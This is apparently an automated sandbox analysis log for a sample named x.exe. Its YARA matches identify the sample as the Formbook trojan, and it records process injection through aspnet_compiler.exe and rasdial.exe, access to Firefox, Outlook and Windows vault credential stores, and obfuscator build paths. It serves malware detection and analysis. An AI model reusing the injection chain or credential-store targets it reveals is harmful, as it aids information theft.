            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEEE266_2_04BEEE26
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B30E596_2_04B30E59
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BAEFA06_2_04BAEFA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B3CFE06_2_04B3CFE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B22FC86_2_04B22FC8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B50F306_2_04B50F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD2F306_2_04BD2F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B72F286_2_04B72F28
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BA4F406_2_04BA4F40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B168B86_2_04B168B8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B5E8F06_2_04B5E8F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B3A8406_2_04B3A840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B328406_2_04B32840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B329A06_2_04B329A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BFA9A66_2_04BFA9A6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B469626_2_04B46962
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B2EA806_2_04B2EA80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE6BD76_2_04BE6BD7
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEAB406_2_04BEAB40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEF43F6_2_04BEF43F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B214606_2_04B21460
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BCD5B06_2_04BCD5B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BF95C36_2_04BF95C3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE75716_2_04BE7571
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE16CC6_2_04BE16CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B756306_2_04B75630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEF7B06_2_04BEF7B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE70E96_2_04BE70E9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEF0E06_2_04BEF0E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BDF0CC6_2_04BDF0CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B370C06_2_04B370C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B3B1B06_2_04B3B1B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B1F1726_2_04B1F172
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BFB16B6_2_04BFB16B
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B6516C6_2_04B6516C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B352A06_2_04B352A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD12ED6_2_04BD12ED
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B4B2C06_2_04B4B2C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B7739A6_2_04B7739A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE132D6_2_04BE132D
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B1D34C6_2_04B1D34C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEFCF26_2_04BEFCF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BA9C326_2_04BA9C32
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B4FDC06_2_04B4FDC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE7D736_2_04BE7D73
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE1D5A6_2_04BE1D5A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B33D406_2_04B33D40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B39EB06_2_04B39EB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEFFB16_2_04BEFFB1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B31F926_2_04B31F92
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF3FD56_2_04AF3FD5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF3FD26_2_04AF3FD2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEFF096_2_04BEFF09
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B338E06_2_04B338E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B9D8006_2_04B9D800
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BC59106_2_04BC5910
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B399506_2_04B39950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B4B9506_2_04B4B950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BCDAAC6_2_04BCDAAC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B75AA06_2_04B75AA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD1AA36_2_04BD1AA3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BDDAC66_2_04BDDAC6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BA3A6C6_2_04BA3A6C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEFA496_2_04BEFA49
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE7A466_2_04BE7A46
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B4FB806_2_04B4FB80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BA5BF06_2_04BA5BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B6DBF96_2_04B6DBF9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEFB766_2_04BEFB76
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C516E06_2_02C516E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C4C5DE6_2_02C4C5DE
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C4C5E06_2_02C4C5E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C4A8806_2_02C4A880
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C4C8006_2_02C4C800
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C52F806_2_02C52F80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C52F7B6_2_02C52F7B
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C54D906_2_02C54D90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C6B3F06_2_02C6B3F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_049EE6FC6_2_049EE6FC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_049ED7686_2_049ED768
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_049EE2466_2_049EE246
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_049F533C6_2_049F533C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_049EE3636_2_049EE363
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01AAB970 appears 280 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01B3F290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01B07E54 appears 111 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01B2EA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01AF5130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04B1B970 appears 280 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04B77E54 appears 111 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04B65130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04B9EA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04BAF290 appears 105 times
            Source: x.exe, 00000000.00000002.3320685418.0000000003212000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDEMONCODER.dll6 vs x.exe
            Source: x.exe, 00000000.00000002.3320685418.000000000320A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDEMONCODER.dll6 vs x.exe
            Source: x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs x.exe
            Source: x.exe, 00000000.00000002.3320685418.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs x.exe
            Source: x.exe, 00000000.00000002.3320685418.00000000030DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs x.exe
            Source: x.exe, 00000000.00000000.1460579606.0000000000E0A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBXCJKS1233.exe6 vs x.exe
            Source: x.exe, 00000000.00000002.3320685418.0000000003185000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDEMONCODER.dll6 vs x.exe
            Source: x.exe, 00000000.00000002.3316517414.000000000147E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs x.exe
            Source: x.exe, 00000000.00000002.3326631690.0000000006450000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDEMONCODER.dll6 vs x.exe
            Source: x.exe, 00000000.00000002.3325127420.0000000005760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs x.exe
            Source: firefox.exe, 0000000A.00000002.2177618283.0000000013F4C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameaspnet_compiler.exeT vs x.exe
            Source: x.exeBinary or memory string: OriginalFilenameBXCJKS1233.exe6 vs x.exe
            Source: x.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: x.exe, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
            Source: 0.2.x.exe.3212c4c.3.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
            Source: 0.2.x.exe.6450000.7.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
            Source: 0.2.x.exe.320afa8.2.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@11/8
            Source: C:\Users\user\Desktop\x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.logJump to behavior
            Source: C:\Users\user\Desktop\x.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\rasdial.exeFile created: C:\Users\user\AppData\Local\Temp\48663I1MJump to behavior
            Source: x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: x.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2069606587.0000000002F14000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2069545356.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3316528748.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3316528748.0000000002F14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: x.exe ReversingLabs: Detection: 21%
            Source: unknown Process created: C:\Users\user\Desktop\x.exe "C:\Users\user\Desktop\x.exe"
            Source: C:\Users\user\Desktop\x.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\x.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\x.exe Section loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\x.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: x.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: x.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: x.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: x.exe, 00000000.00000002.3320685418.0000000003212000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.000000000320A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3326631690.0000000006450000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: crUcuBAsmdG.exe, 00000005.00000002.3316271241.000000000054E000.00000002.00000001.01000000.00000007.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3316446902.000000000054E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1891422304.0000000004945000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1889576248.000000000479E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: aspnet_compiler.exe, 00000003.00000002.1889491293.0000000001628000.00000004.00000020.00020000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000002.3317911135.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: x.exe, 00000000.00000002.3320685418.0000000003212000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.000000000320A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3326631690.0000000006450000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.1891422304.0000000004945000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1889576248.000000000479E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: aspnet_compiler.exe, 00000003.00000002.1889491293.0000000001628000.00000004.00000020.00020000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000002.3317911135.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BXCJKS1233.pdb source: x.exe
